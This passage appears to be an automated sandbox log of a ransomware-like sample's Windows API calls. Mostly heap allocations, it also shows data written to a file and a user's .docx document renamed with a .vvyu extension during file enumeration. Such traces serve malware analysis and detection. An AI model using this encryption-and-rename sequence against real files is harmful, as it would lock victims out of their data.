Flags=0x0, Size=0x4) returned 0x2c37910 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a168 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1c8 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1e0 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a180 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a150 [0195.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42730 | out: hHeap=0x6a0000) returned 1 [0195.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.467] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x89e1, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x89e1, lpOverlapped=0x0) returned 1 [0195.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.468] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x89e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.468] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.469] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.470] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.470] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.470] CloseHandle (hObject=0x52c) returned 1 [0195.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0195.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d2cc80 [0195.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0195.483] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\YpCtinwvv6IL210.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\ypctinwvv6il210.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\YpCtinwvv6IL210.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\ypctinwvv6il210.docx.vvyu")) returned 1 [0195.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.485] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0195.489] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d89710, ftCreationTime.dwHighDateTime=0x1d89e4f, ftLastAccessTime.dwLowDateTime=0x9d1aa290, ftLastAccessTime.dwHighDateTime=0x1d8a6cb, ftLastWriteTime.dwLowDateTime=0x9d1aa290, ftLastWriteTime.dwHighDateTime=0x1d8a6cb, nFileSizeHigh=0x0, nFileSizeLow=0x89e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YpCtinwvv6IL210.docx", cAlternateFileName="YPCTIN~1.DOC")) returned 0 [0195.489] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0195.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0195.490] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0195.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0195.490] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0195.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0195.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0195.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.511] 